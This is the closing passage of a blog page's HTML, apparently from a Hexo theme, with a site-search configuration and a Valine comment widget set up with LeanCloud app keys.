        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   




   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: false,
    appId: '8zpT8ubnMCs0p3vahHLvnomJ-gzGzoHsz',
    appKey: 'QjoNCC6qtXBclb6ll0XkwEbV',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: meta,
    pageSize: '10' || 10,
    visitor: false
  });
  </script>

     







</body>
</html>